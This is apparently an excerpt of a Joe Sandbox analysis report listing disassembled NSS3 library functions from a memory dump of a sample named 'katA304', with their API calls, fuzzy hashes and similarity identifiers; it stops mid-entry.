                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                            • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                            • API String ID: 3905088656-1374795319
                                                            • Opcode ID: 8daa37abafe1704871519b71c92edfa5a1de0c30ace29bd156f8e1583358b123
                                                            • Instruction ID: 7ceb4a58c22ac95fd0ff2d84d47b9f3bed13164c069860ac411e2e3072b1837d
                                                            • Opcode Fuzzy Hash: 8daa37abafe1704871519b71c92edfa5a1de0c30ace29bd156f8e1583358b123
                                                            • Instruction Fuzzy Hash: 06F044B59001647BDA017FA49C49C9B3E2EDF4A6A4F444424FD0997602DA35E92497B2
                                                            Function 6CA74DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PORT_NewArena_Util.NSS3(00000400), ref: 6CA74DCB
                                                              • Part of subcall function 6CA60FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA087ED,00000800,6C9FEF74,00000000), ref: 6CA61000
                                                              • Part of subcall function 6CA60FF0: PR_NewLock.NSS3(?,00000800,6C9FEF74,00000000), ref: 6CA61016
                                                              • Part of subcall function 6CA60FF0: PL_InitArenaPool.NSS3(00000000,security,6CA087ED,00000008,?,00000800,6C9FEF74,00000000), ref: 6CA6102B
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6CA74DE1
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA610F3
                                                              • Part of subcall function 6CA610C0: EnterCriticalSection.KERNEL32(?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6110C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61141
                                                              • Part of subcall function 6CA610C0: PR_Unlock.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61182
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6119C
                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6CA74DFF
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA74E59
                                                              • Part of subcall function 6CA5FAB0: free.MOZGLUE(?,-00000001,?,?,6C9FF673,00000000,00000000), ref: 6CA5FAC7
                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CB3300C,00000000), ref: 6CA74EB8
                                                            • SECOID_FindOID_Util.NSS3(?), ref: 6CA74EFF
                                                            • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6CA74F56
                                                            • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA7521A
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                            • String ID:
                                                            • API String ID: 1025791883-0
                                                            • Opcode ID: a8296c57188b87184f6f2544c558b653d7163256695497f355493f7e79e6f911
                                                            • Instruction ID: c0c89fbaaac952aca200736d77415531f0d72732ef30d6e684c87610c8800ae4
                                                            • Opcode Fuzzy Hash: a8296c57188b87184f6f2544c558b653d7163256695497f355493f7e79e6f911
                                                            • Instruction Fuzzy Hash: 58F16B75E00209CFDB14CF59D8406AEB7B2BF44358F294169E915AB781E735E9C2CFA0
                                                            Function 6CA70C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SECOID_GetAlgorithmTag_Util.NSS3(6CA72C2A), ref: 6CA70C81
                                                              • Part of subcall function 6CA5BE30: SECOID_FindOID_Util.NSS3(6CA1311B,00000000,?,6CA1311B,?), ref: 6CA5BE44
                                                              • Part of subcall function 6CA48500: SECOID_GetAlgorithmTag_Util.NSS3(6CA495DC,00000000,00000000,00000000,?,6CA495DC,00000000,00000000,?,6CA27F4A,00000000,?,00000000,00000000), ref: 6CA48517
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA70CC4
                                                              • Part of subcall function 6CA5FAB0: free.MOZGLUE(?,-00000001,?,?,6C9FF673,00000000,00000000), ref: 6CA5FAC7
                                                            • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CA70CD5
                                                            • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CA70D1D
                                                            • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CA70D3B
                                                            • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CA70D7D
                                                            • free.MOZGLUE(00000000), ref: 6CA70DB5
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA70DC1
                                                            • free.MOZGLUE(00000000), ref: 6CA70DF7
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA70E05
                                                            • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CA70E0F
                                                              • Part of subcall function 6CA495C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CA27F4A,00000000,?,00000000,00000000), ref: 6CA495E0
                                                              • Part of subcall function 6CA495C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CA27F4A,00000000,?,00000000,00000000), ref: 6CA495F5
                                                              • Part of subcall function 6CA495C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CA49609
                                                              • Part of subcall function 6CA495C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CA4961D
                                                              • Part of subcall function 6CA495C0: PK11_GetInternalSlot.NSS3 ref: 6CA4970B
                                                              • Part of subcall function 6CA495C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CA49756
                                                              • Part of subcall function 6CA495C0: PK11_GetIVLength.NSS3(?), ref: 6CA49767
                                                              • Part of subcall function 6CA495C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CA4977E
                                                              • Part of subcall function 6CA495C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA4978E
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                            • String ID:
                                                            • API String ID: 3136566230-0
                                                            • Opcode ID: 43128a534f7d457badba2ee4d3ee61e6f1a4cbb1c7a3bf813e1441c3f92bf892
                                                            • Instruction ID: 156e848dbea0af0735eb7b091e138d0e41a493ea58b99f2397e7a656b4cfc3fc
                                                            • Opcode Fuzzy Hash: 43128a534f7d457badba2ee4d3ee61e6f1a4cbb1c7a3bf813e1441c3f92bf892
                                                            • Instruction Fuzzy Hash: E241E3B9900245AFEB109F64DE45BAF7674BF0430CF184128E91557742E736EA98CBF2
                                                            Function 6CA1FCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6CA1FCBD
                                                            • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6CA1FCCC
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6CA1FCEF
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA1FD32
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6CA1FD46
                                                            • PORT_Alloc_Util.NSS3(00000001), ref: 6CA1FD51
                                                            • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6CA1FD6D
                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA1FD84
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                            • String ID: :
                                                            • API String ID: 183580322-336475711
                                                            • Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                            • Instruction ID: 96afe017c7a1472ea3849a61d2f4f4d1b72b8142b0da3cd19bf8eee9c7df287e
                                                            • Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                            • Instruction Fuzzy Hash: 3531E2B29182855BEB008AA4DC057BF77A8AF5435CF190128DC14A7F00E771E958C7D2
                                                            Function 6CA36C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_DigestInit), ref: 6CA36C66
                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA36C94
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA36CA3
                                                              • Part of subcall function 6CB1D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB1D963
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA36CB9
                                                            • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CA36CD5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                            • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
                                                            • API String ID: 1003633598-3690128261
                                                            • Opcode ID: cad6bffce913b8759dfed6217d1ba2d1cfd4b8cd91a639d5da262828b436c2d8
                                                            • Instruction ID: d012b78608960f32962f03d5033c116908b83308349a97c23e68d22fccbdae09
                                                            • Opcode Fuzzy Hash: cad6bffce913b8759dfed6217d1ba2d1cfd4b8cd91a639d5da262828b436c2d8
                                                            • Instruction Fuzzy Hash: D121F7356041649BDB019B26ED68BAE37B9FB82358F485025E40DD7B41DF34988CC792
                                                            Function 6CA39DD0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_SessionCancel), ref: 6CA39DF6
                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA39E24
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA39E33
                                                              • Part of subcall function 6CB1D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB1D963
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA39E49
                                                            • PR_LogPrint.NSS3( flags = 0x%x,?), ref: 6CA39E65
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                            • String ID: flags = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_SessionCancel
                                                            • API String ID: 1003633598-1678415578
                                                            • Opcode ID: a3afe1be04ce265d1e0be94375de29762a623a6d5e4baeec62b5917db4e28b7a
                                                            • Instruction ID: 217ae97767099b8069a5d919551761ea6305a1f1875b0f94d013f38629721c8c
                                                            • Opcode Fuzzy Hash: a3afe1be04ce265d1e0be94375de29762a623a6d5e4baeec62b5917db4e28b7a
                                                            • Instruction Fuzzy Hash: 6F213A756012649FEB009B65EE98B7E33B9EB4275CF084024E80DD7B81DF348C88C792
                                                            Function 6CA06DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SECITEM_ArenaDupItem_Util.NSS3(?,6CA07D8F,6CA07D8F,?,?), ref: 6CA06DC8
                                                              • Part of subcall function 6CA5FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CA5FE08
                                                              • Part of subcall function 6CA5FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CA5FE1D
                                                              • Part of subcall function 6CA5FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CA5FE62
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CA07D8F,?,?), ref: 6CA06DD5
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA610F3
                                                              • Part of subcall function 6CA610C0: EnterCriticalSection.KERNEL32(?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6110C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61141
                                                              • Part of subcall function 6CA610C0: PR_Unlock.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61182
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6119C
                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CB28FA0,00000000,?,?,?,?,6CA07D8F,?,?), ref: 6CA06DF7
                                                              • Part of subcall function 6CA5B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CB318D0,?), ref: 6CA5B095
                                                            • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CA06E35
                                                              • Part of subcall function 6CA5FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CA5FE29
                                                              • Part of subcall function 6CA5FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CA5FE3D
                                                              • Part of subcall function 6CA5FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6CA5FE6F
                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CA06E4C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6116E
                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CB28FE0,00000000), ref: 6CA06E82
                                                              • Part of subcall function 6CA06AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CA0B21D,00000000,00000000,6CA0B219,?,6CA06BFB,00000000,?,00000000,00000000,?,?,?,6CA0B21D), ref: 6CA06B01
                                                              • Part of subcall function 6CA06AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CA06B8A
                                                            • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CA06F1E
                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CA06F35
                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CB28FE0,00000000), ref: 6CA06F6B
                                                            • PR_SetError.NSS3(FFFFE005,00000000,6CA07D8F,?,?), ref: 6CA06FE1
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                            • String ID:
                                                            • API String ID: 587344769-0
                                                            • Opcode ID: 0ce30f030b89fa2b8bb50cda500487525ad03fa550aa91d4b359918148c64718
                                                            • Instruction ID: f465304126eb2b302b11a0c061c9c101dadc2bba2199d69518c8530370d7af46
                                                            • Opcode Fuzzy Hash: 0ce30f030b89fa2b8bb50cda500487525ad03fa550aa91d4b359918148c64718
                                                            • Instruction Fuzzy Hash: 39717E71E102469BEB00CF55DD40BAABBA4BF5434CF194229EC08D7B11E771EAE8CB90
                                                            Function 6CA4ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsGetValue.KERNEL32(?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AE10
                                                            • EnterCriticalSection.KERNEL32(?,?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AE24
                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,6CA2D079,00000000,00000001), ref: 6CA4AE5A
                                                            • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AE6F
                                                            • free.MOZGLUE(85145F8B,?,?,?,?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AE7F
                                                            • TlsGetValue.KERNEL32(?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AEB1
                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AEC9
                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AEF1
                                                            • free.MOZGLUE(6CA2CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA2CDBB,?), ref: 6CA4AF0B
                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AF30
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                            • String ID:
                                                            • API String ID: 161582014-0
                                                            • Opcode ID: 20dede4ba82062fd021d33dda6401bc3924b9d3aa12634858b0a80b015c2a998
                                                            • Instruction ID: 938b14ce93b575a62cebc6fd2307c1ee1913ca7fb011f20022aabfda3415974c
                                                            • Opcode Fuzzy Hash: 20dede4ba82062fd021d33dda6401bc3924b9d3aa12634858b0a80b015c2a998
                                                            • Instruction Fuzzy Hash: 1C51A1B5A01612AFDB01DF25D885B56B7B5FF08318F188664E81897E11E731FCA4CBD1
                                                            Function 6CA24CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsGetValue.KERNEL32(?,00000000,00000000,?,6CA2AB7F,?,00000000,?), ref: 6CA24CB4
                                                            • EnterCriticalSection.KERNEL32(0000001C,?,6CA2AB7F,?,00000000,?), ref: 6CA24CC8
                                                            • TlsGetValue.KERNEL32(?,6CA2AB7F,?,00000000,?), ref: 6CA24CE0
                                                            • EnterCriticalSection.KERNEL32(?,?,6CA2AB7F,?,00000000,?), ref: 6CA24CF4
                                                            • PL_HashTableLookup.NSS3(?,?,?,6CA2AB7F,?,00000000,?), ref: 6CA24D03
                                                            • PR_Unlock.NSS3(?,00000000,?), ref: 6CA24D10
                                                              • Part of subcall function 6CAADD70: TlsGetValue.KERNEL32 ref: 6CAADD8C
                                                              • Part of subcall function 6CAADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CAADDB4
                                                            • PR_Now.NSS3(?,00000000,?), ref: 6CA24D26
                                                              • Part of subcall function 6CAC9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CB10A27), ref: 6CAC9DC6
                                                              • Part of subcall function 6CAC9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CB10A27), ref: 6CAC9DD1
                                                              • Part of subcall function 6CAC9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAC9DED
                                                            • PR_Unlock.NSS3(?,?,00000000,?), ref: 6CA24D98
                                                            • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CA24DDA
                                                            • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CA24E02
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID:
                                                            • API String ID: 4032354334-0
                                                            • Opcode ID: 09f760fdea21fc7b7c3fc6e5b2d409237dd35ef9de997e803a64a3af15446270
                                                            • Instruction ID: c4a82d83b296526b77ae2e0efcef4f3ef2efcb57ae7612ca35f11a105cc4a671
                                                            • Opcode Fuzzy Hash: 09f760fdea21fc7b7c3fc6e5b2d409237dd35ef9de997e803a64a3af15446270
                                                            • Instruction Fuzzy Hash: 9441C5B5E002159BEB019F78ED40A6677B8FF15258F0D4170EC1887B12EB35D9A8CBE1
                                                            Function 6C9EFC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • sqlite3_initialize.NSS3 ref: 6C9EFD18
                                                            • sqlite3_initialize.NSS3 ref: 6C9EFD5F
                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C9EFD89
                                                            • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C9EFD99
                                                            • sqlite3_free.NSS3(00000000), ref: 6C9EFE3C
                                                            • sqlite3_free.NSS3(?), ref: 6C9EFEE3
                                                            • sqlite3_free.NSS3(?), ref: 6C9EFEEE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
